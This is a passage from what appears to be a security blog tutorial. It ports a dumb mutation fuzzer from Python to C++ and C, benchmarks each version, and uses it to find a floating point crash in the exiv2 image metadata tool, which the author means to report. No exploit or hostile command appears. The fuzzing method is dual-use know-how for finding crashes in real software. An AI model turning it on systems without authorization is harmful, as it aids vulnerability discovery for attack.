	data.replace(picked_data_index, magic[picked_magic_index].length(), magic[picked_magic_index]);

	return data;

}

//
// returns 0 or 1;
//
int func_pick()
{
	int result = rand() % 2;

	return result;
}

These functions are pretty similar to our Python implementation as well. vector_gen() pretty much just creates our vector of ‘magic values’ and then subsequent functions like magic() use the vector to randomly pick an index and then overwrite data in the valid jpeg with mutated data accordingly.

func_pick() is very simple and just returns a 0 or a 1 so that our fuzzer can randomly bit_flip() or magic() mutate our valid jpeg. To keep things consistent, let’s have our fuzzer only choose bit_flip() for the time being by adding a temporary line of function = 1 to our program so that we match our Python testing.

Here is our main() function which executes all of our code so far:

int main(int argc, char** argv)
{

	if (argc < 3)
	{
		std::cout << "Usage: ./cppfuzz <valid jpeg> <number_of_fuzzing_iterations>\n";
		std::cout << "Usage: ./cppfuzz Canon_40D.jpg 10000\n";
		return 1;
	}

	// start timer
	auto start = std::chrono::high_resolution_clock::now();

	// initialize our random seed
	srand((unsigned)time(NULL));

	// generate our vector of magic numbers
	std::vector<std::string> magic_vector = vector_gen();

	std::string filename = argv[1];
	int iterations = atoi(argv[2]);

	int counter = 0;
	while (counter < iterations)
	{

		std::string data = get_bytes(filename);

		int function = func_pick();
		function = 1;
		if (function == 0)
		{
			// utilize the magic mutation method; create new jpg; send to exiv2
			std::string mutated = magic(data, magic_vector);
			create_new(mutated);
			exif(mutated,counter);
			counter++;
		}
		else
		{
			// utilize the bit flip mutation; create new jpg; send to exiv2
			std::string mutated = bit_flip(data);
			create_new(mutated);
			exif(mutated,counter);
			counter++;
		}
	}

	// stop timer and print execution time
	auto stop = std::chrono::high_resolution_clock::now();
	auto duration = std::chrono::duration_cast<std::chrono::milliseconds>(stop - start);
	std::cout << "Execution Time: " << duration.count() << "ms\n";

	return 0;
}

We get a valid JPEG to mutate and a number of fuzzing iterations from the command line arguments. We then have some timing mechanisms in place with the std::chrono namespace to time how long our program takes to execute.

We’re kind of cheating here by only selecting bit_flip() type mutations, but that is what we did in Python as well so we want an ‘Apples to Apples’ comparison.

Let’s go ahead and run this for 100,000 iterations and compare it our Python fuzzer benchmark of 256 seconds.

Once we run our C++ fuzzer, we get a printed time spent in milleseconds of: Execution Time: 172638ms or 172 seconds.

So we comfortably destroyed our Python fuzzer with our new C++ fuzzer! This is so exciting. Let’s go ahead and do some math here: 172/256 = 67%. So we’re roughly 33% faster with our C++ implementation. (God I hope you aren’t some 200 IQ math genius reading this and throwing up on your keyboard).

Let’s take our optimized Python and C++ fuzzers and take on a new target!

Selecting a New Victim

Looking at what comes pre-installed on Kali Linux since that’s our operating environment, let’s take a peek at exiv2 which is found in /usr/bin/exiv2.

root@kali:~# exiv2 -h
Usage: exiv2 [ options ] [ action ] file ...

Manipulate the Exif metadata of images.

Actions:
  ad | adjust   Adjust Exif timestamps by the given time. This action
                requires at least one of the -a, -Y, -O or -D options.
  pr | print    Print image metadata.
  rm | delete   Delete image metadata from the files.
  in | insert   Insert metadata from corresponding *.exv files.
                Use option -S to change the suffix of the input files.
  ex | extract  Extract metadata to *.exv, *.xmp and thumbnail image files.
  mv | rename   Rename files and/or set file timestamps according to the
                Exif create timestamp. The filename format can be set with
                -r format, timestamp options are controlled with -t and -T.
  mo | modify   Apply commands to modify (add, set, delete) the Exif and
                IPTC metadata of image files or set the JPEG comment.
                Requires option -c, -m or -M.
  fi | fixiso   Copy ISO setting from the Nikon Makernote to the regular
                Exif tag.
  fc | fixcom   Convert the UNICODE Exif user comment to UCS-2. Its current
                character encoding can be specified with the -n option.

Options:
   -h      Display this help and exit.
   -V      Show the program version and exit.
   -v      Be verbose during the program run.
   -q      Silence warnings and error messages during the program run (quiet).
   -Q lvl  Set log-level to d(ebug), i(nfo), w(arning), e(rror) or m(ute).
   -b      Show large binary values.
   -u      Show unknown tags.
   -g key  Only output info for this key (grep).
   -K key  Only output info for this key (exact match).
   -n enc  Charset to use to decode UNICODE Exif user comments.
   -k      Preserve file timestamps (keep).
   -t      Also set the file timestamp in 'rename' action (overrides -k).
   -T      Only set the file timestamp in 'rename' action, do not rename
           the file (overrides -k).
   -f      Do not prompt before overwriting existing files (force).
   -F      Do not prompt before renaming files (Force).
   -a time Time adjustment in the format [-]HH[:MM[:SS]]. This option
           is only used with the 'adjust' action.
   -Y yrs  Year adjustment with the 'adjust' action.
   -O mon  Month adjustment with the 'adjust' action.
   -D day  Day adjustment with the 'adjust' action.
   -p mode Print mode for the 'print' action. Possible modes are:
             s : print a summary of the Exif metadata (the default)
             a : print Exif, IPTC and XMP metadata (shortcut for -Pkyct)
             t : interpreted (translated) Exif data (-PEkyct)
             v : plain Exif data values (-PExgnycv)
             h : hexdump of the Exif data (-PExgnycsh)
             i : IPTC data values (-PIkyct)
             x : XMP properties (-PXkyct)
             c : JPEG comment
             p : list available previews
             S : print structure of image
             X : extract XMP from image
   -P flgs Print flags for fine control of tag lists ('print' action):
             E : include Exif tags in the list
             I : IPTC datasets
             X : XMP properties
             x : print a column with the tag number
             g : group name
             k : key
             l : tag label
             n : tag name
             y : type
             c : number of components (count)
             s : size in bytes
             v : plain data value
             t : interpreted (translated) data
             h : hexdump of the data
   -d tgt  Delete target(s) for the 'delete' action. Possible targets are:
             a : all supported metadata (the default)
             e : Exif section
             t : Exif thumbnail only
             i : IPTC data
             x : XMP packet
             c : JPEG comment
   -i tgt  Insert target(s) for the 'insert' action. Possible targets are
           the same as those for the -d option, plus a modifier:
             X : Insert metadata from an XMP sidecar file <file>.xmp
           Only JPEG thumbnails can be inserted, they need to be named
           <file>-thumb.jpg
   -e tgt  Extract target(s) for the 'extract' action. Possible targets
           are the same as those for the -d option, plus a target to extract
           preview images and a modifier to generate an XMP sidecar file:
             p[<n>[,<m> ...]] : Extract preview images.
             X : Extract metadata to an XMP sidecar file <file>.xmp
   -r fmt  Filename format for the 'rename' action. The format string
           follows strftime(3). The following keywords are supported:
             :basename:   - original filename without extension
             :dirname:    - name of the directory holding the original file
             :parentname: - name of parent directory
           Default filename format is %Y%m%d_%H%M%S.
   -c txt  JPEG comment string to set in the image.
   -m file Command file for the modify action. The format for commands is
           set|add|del <key> [[<type>] <value>].
   -M cmd  Command line for the modify action. The format for the
           commands is the same as that of the lines of a command file.
   -l dir  Location (directory) for files to be inserted from or extracted to.
   -S .suf Use suffix .suf for source files for insert command.

Looking at the help guidance, let’s just go ahead and randomly take a crack at pr for Print image metadata and also -v for Be verbose during the program run. You can see from this help guidance that there is plenty of attack surface here for us explore but let’s keep things simple for now.

Our command string now in our fuzzers will be something like exiv2 pr -v mutated.jpg.

Let’s go ahead and update our fuzzers and see if we can find some more bugs on a much harder target. It’s worth mentioning that this target is currently supported, and not a trivial binary for us to find bugs on like our last target (an unsupported 7 year old project on Github).

This target has already been fuzzed by much more advanced fuzzers, you can simply google for something like ‘ASan exiv2’ and get plenty of hits of fuzzers creating segfaults in the binary and forwarding the ASan output to the github repository as a bug. This is a significant step up from our last target.

exiv2 on Github

exiv2 Website

Fuzzing Our New Target

Let’s start off with our new and improved Python fuzzer and monitor it’s performance over 50,000 iterations. Let’s add some code that monitors for Floating point exceptions in addition to our Segmentation fault detection (Call it a hunch!). Our new exif() function will look like this:

def exif(counter,data):

    p = Popen(["exiv2", "pr", "-v", "mutated.jpg"], stdout=PIPE, stderr=PIPE)
    (out,err) = p.communicate()

    if p.returncode == -11:
    	f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
    	f.write(data)
    	print("Segfault!")

    elif p.returncode == -8:
    	f = open("crashes2/crash.{}.jpg".format(str(counter)), "ab+")
    	f.write(data)
    	print("Floating Point!")

Looking at the output from python3 -m cProfile -s cumtime subpro.py ~/jpegs/Canon_40D.jpg:

75780446 function calls (75780309 primitive calls) in 213.595 seconds

   Ordered by: cumulative time

   ncalls  tottime  percall  cumtime  percall filename:lineno(function)
     15/1    0.000    0.000  213.595  213.595 {built-in method builtins.exec}
        1    1.481    1.481  213.595  213.595 subpro.py:3(<module>)
    50000    0.818    0.000  187.205    0.004 subpro.py:111(exif)
    50000    0.543    0.000  143.499    0.003 subprocess.py:920(communicate)
    50000    6.773    0.000  142.873    0.003 subprocess.py:1662(_communicate)
  1641352    3.186    0.000  122.668    0.000 selectors.py:402(select)
  1641352  118.799    0.000  118.799    0.000 {method 'poll' of 'select.poll' objects}
    50000    1.220    0.000   42.888    0.001 subprocess.py:681(__init__)
    50000    4.400    0.000   39.364    0.001 subprocess.py:1412(_execute_child)
  1691919   25.759    0.000   25.759    0.000 {built-in method posix.read}
    50000    3.863    0.000   13.938    0.000 subpro.py:14(bit_flip)
  7950000    3.587    0.000    9.991    0.000 random.py:256(choice)
    50000    7.495    0.000    7.495    0.000 {built-in method _posixsubprocess.fork_exec}
    50000    0.148    0.000    7.081    0.000 subpro.py:105(create_new)
  7950000    3.884    0.000    5.764    0.000 random.py:224(_randbelow)
   200000    4.582    0.000    4.582    0.000 {built-in method io.open}
    50000    4.192    0.000    4.192    0.000 {method 'close' of '_io.BufferedRandom' objects}
    50000    1.339    0.000    3.612    0.000 os.py:617(get_exec_path)
    50000    1.641    0.000    3.309    0.000 subpro.py:8(get_bytes)
   100000    0.077    0.000    1.822    0.000 subprocess.py:1014(wait)
   100000    0.432    0.000    1.746    0.000 subprocess.py:1621(_wait)
   100000    0.256    0.000    1.735    0.000 selectors.py:351(register)
   100000    0.619    0.000    1.422    0.000 selectors.py:234(register)
   350000    0.380    0.000    1.402    0.000 subprocess.py:1471(<genexpr>)
 12066004    1.335    0.000    1.335    0.000 {method 'getrandbits' of '_random.Random' objects}
    50000    0.063    0.000    1.222    0.000 subprocess.py:1608(_try_wait)
    50000    1.160    0.000    1.160    0.000 {built-in method posix.waitpid}
   100000    0.519    0.000    1.143    0.000 os.py:674(__getitem__)
  1691352    0.902    0.000    1.097    0.000 selectors.py:66(__len__)
  7234121    1.023    0.000    1.023    0.000 {method 'append' of 'list' objects}
-----SNIP-----

It appears we took 213 seconds total and didn’t really find any bugs, that’s a shame, but could just be luck. Let’s run our C++ fuzzer in the same exact circumstances and monitor the output.

Here we go, we get a similiar time but much improved:

root@kali:~# ./blogcpp ~/jpegs/Canon_40D.jpg 50000
Execution Time: 170829ms

That’s a pretty significant improvement, 43 seconds. That’s 20% off of our Python time. (Again, I apologize to math people.)

Let’s keep our C++ fuzzer running for a bit and see if we find any bugs :).

Bugs on Our New Target!

After maybe 10 seconds of running the fuzzer again, I got this terminal output:

root@kali:~# ./blogcpp ~/jpegs/Canon_40D.jpg 1000000
Floating Point!

It appears we have satisfied requirements for a Floating Point exception. We should have a nice jpg waiting for us in the cppcrashes directory.

root@kali:~/cppcrashes# ls
crash.522.jpg

Let’s confirm the bug by running exiv2 against this sample:

root@kali:~/cppcrashes# exiv2 pr -v crash.522.jpg
File 1/1: crash.522.jpg
Error: Offset of directory Image, entry 0x011b is out of bounds: Offset = 0x080000ae; truncating the entry
Warning: Directory Image, entry 0x8825 has unknown Exif (TIFF) type 68; setting type size 1.
Warning: Directory Image, entry 0x8825 doesn't look like a sub-IFD.
File name       : crash.522.jpg
File size       : 7958 Bytes
MIME type       : image/jpeg
Image size      : 100 x 68
Camera make     : Aanon
Camera model    : Canon EOS 40D
Image timestamp : 2008:05:30 15:56:01
Image number    : 
Exposure time   : 1/160 s
Aperture        : F7.1
Floating point exception

We indeed found a new bug! This is super exciting. We should issue a bug report to the exiv2 developers on Github.

Conclusion

We first optimized our fuzzer in Python and then rewrote it in C++. We gained some massive performance advantages and even found some new bugs on a new harder target.

For some fun, let’s compare our original fuzzer’s performance for 50,000 iterations:

123052109 function calls (123001828 primitive calls) in 6243.939 seconds

As you can see, 6,243 seconds is significantly slower than our C++ fuzzer benchmark of 170 seconds.

Addendum 15/May/2020

Just playing around with porting the C++ fuzzer to C and I made some modest improvements on my own. One of the logic changes I made was to collect the data from the original valid image only once and then copy that data into a newly allocated buffer each fuzzing iteration and then do the mutation operations on the newly allocated buffer. This C version of basically the same C++ fuzzer performed pretty well compared to the C++ fuzzer. Here is a comparison between the two for 200,000 iterations (you can ignore the crash findings as this fuzzer is extremely dumb and 100% random):

h0mbre:~$ time ./cppfuzz Canon_40D.jpg 200000
<snipped_results>

real    10m45.371s
user    7m14.561s
sys     3m10.529s

h0mbre:~$ time ./cfuzz Canon_40D.jpg 200000
<snipped_results>

real    10m7.686s
user    7m27.503s
sys     2m20.843s

So, over 200,000 iterations we end up saving about 35-40 seconds. This was pretty typical in my testing. So just by the few logic changes and using less C++-provided abstractions we saved a lot of sys time. We increased speed by about 5%.

Monitoring Child Process Exit Status

After completing the C translation, I went to Twitter to ask for suggestions about performance improvements. @lcamtuf, the creator of AFL, explained to me that I shouldn’t be using popen() in my code as it spawns a shell and performs abysmally. Here is the code segment I asked for help on:

void exif(int iteration) {
    
    FILE *fileptr;
    
    //fileptr = popen("exif_bin target.jpeg -verbose >/dev/null 2>&1", "r");
    fileptr = popen("exiv2 pr -v mutated.jpeg >/dev/null 2>&1", "r");

    int status = WEXITSTATUS(pclose(fileptr));
    switch(status) {
        case 253:
            break;
        case 0:
            break;
        case 1:
            break;
        default:
            crashes++;
            printf("\r[>] Crashes: %d", crashes);
            fflush(stdout);
            char command[50];
            sprintf(command, "cp mutated.jpeg ccrashes/crash.%d.%d",
             iteration,status);
            system(command);
            break;
    }
}

As you can see, we use popen(), run a shell-command, and then close the file pointer to the child process and return the exit-status for monitoring with the WEXITSTATUS macro. I was filtering out some exit codes that I didn’t care about like 253, 0, and 1, and was hoping to see some related to the floating point errors we already found with our C++ fuzzer or maybe even a segfault. @lcamtuf suggested that instead of popen(), I call fork() to spawn a child process, execvp() to have the child process execute a command, and then finally use waitpid() to await the child process termination and return the exit status.

Since we don’t have a proper shell in this syscall path, I had to also open a handle to /dev/null and call dup2() to route both stdout and stderr there as we don’t care about the command output. I also used the WTERMSIG macro to retrieve the signal that terminated the child process in the event that the WIFSIGNALED macro returned true, which would indicate we got a segfault or floating point exception, etc. So now, our updated function looks like this:

void exif(int iteration) {
    
    char* file = "exiv2";
    char* argv[4];
    argv[0] = "pr";
    argv[1] = "-v";
    argv[2] = "mutated.jpeg";
    argv[3] = NULL;
    pid_t child_pid;
    int child_status;

    child_pid = fork();
    if (child_pid == 0) {
        // this means we're the child process
        int fd = open("/dev/null", O_WRONLY);

        // dup both stdout and stderr and send them to /dev/null
        dup2(fd, 1);
        dup2(fd, 2);
        close(fd);

        execvp(file, argv);
        // shouldn't return, if it does, we have an error with the command
        printf("[!] Unknown command for execvp, exiting...\n");
        exit(1);
    }
    else {
        // this is run by the parent process
        do {
            pid_t tpid = waitpid(child_pid, &child_status, WUNTRACED |
             WCONTINUED);
            if (tpid == -1) {
                printf("[!] Waitpid failed!\n");
                perror("waitpid");
            }
            if (WIFEXITED(child_status)) {
                //printf("WIFEXITED: Exit Status: %d\n", WEXITSTATUS(child_status));
            } else if (WIFSIGNALED(child_status)) {
                crashes++;
                int exit_status = WTERMSIG(child_status);
                printf("\r[>] Crashes: %d", crashes);
                fflush(stdout);
                char command[50];
                sprintf(command, "cp mutated.jpeg ccrashes/%d.%d", iteration, 
                exit_status);
                system(command);
            } else if (WIFSTOPPED(child_status)) {
                printf("WIFSTOPPED: Exit Status: %d\n", WSTOPSIG(child_status));
            } else if (WIFCONTINUED(child_status)) {
                printf("WIFCONTINUED: Exit Status: Continued.\n");
            }
        } while (!WIFEXITED(child_status) && !WIFSIGNALED(child_status));
    }
}

You can see that this drastically improves performance for our 200,000 iteration benchmark:

h0mbre:~$ time ./cfuzz2 Canon_40D.jpg 200000
<snipped_results>

real    8m30.371s
user    6m10.219s
sys     2m2.098s

Summary of Results

  • C++ Fuzzer – 310 iterations/sec
  • C Fuzzer – 329 iterations/sec (+ 6%)
  • C Fuzzer 2.0 – 392 iterations/sec (+ 26%)

Thanks to @lcamtuf and @carste1n for the help.

I’ve uploaded the code here: https://github.com/h0mbre/Fuzzing/tree/master/JPEGMutation

❌
❌